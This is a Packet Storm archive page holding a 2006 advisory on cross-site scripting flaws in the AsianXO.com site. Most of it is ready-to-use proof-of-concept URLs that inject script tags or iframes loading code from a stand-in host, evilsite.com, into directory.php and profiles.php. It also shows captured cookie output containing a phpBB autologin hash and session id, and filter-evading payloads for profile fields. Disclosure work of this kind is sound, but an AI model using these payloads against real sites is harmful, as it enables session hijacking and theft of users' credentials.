what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

asianxoXSS.txt

asianxoXSS.txt
Posted Jun 12, 2006
Authored by Luny

AsianXO.com suffers from multiple cross site scripting flaws.

tags | exploit, xss
SHA-256 | 70aff43cafd4226b6c4660f2d0f5b6e4dfd57a09a8fc9db625f281fe8f6e89c7

asianxoXSS.txt

Change Mirror Download
AsianXO.com

Homepage:
http://www.asianxo.com/

Effected files:
directory.php
profiles.php
Input boxes of editing profile

----------------------------

XSS Vulnerability via dir_id:

Directory.php PoC:
http://www.axo2.com/directory.php?dir_id=1"><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT><"

Profiles.php PoC using malformed img tags in front a openended iframe:
http://www.axo2.com/profiles.php?userid=999999999<""><iframe%20src=http://evilsite.com/scriptlet.html%20<

------------------------------

Another XSS example of profiles.php, this time using allowed html tags <br> inaurl injection along with <script> tags,

which also reveals some interesting data:

http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><BR><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

The output text:

This is remote text via xss.js located at evilsite.com phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2210610%22%3B%7D; phpbb2mysql_sid=362562eaac0fc1d69e574584d4f95e60','gallery','height=500,width=700,status=0');">

When converting the whole string from hex value, we notice a autologinid:# along with our cookie data that has our md5'ed hash pw in it.

a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:5:"10610";};

NOTE: You can also use <script>alert(document.cookie)</script> and it will create a popup box with the cookie data in it.

PoC:
http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><script>alert(document.cookie)</script>

---------------------

XSS Vulnerability of input boxes when editing profile:

The location input box doesn't correctly filter all data, for a XSS example we can enter in double < with ' and no

closing >

<'<IMG SRC=javascript:alert("XSS")
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close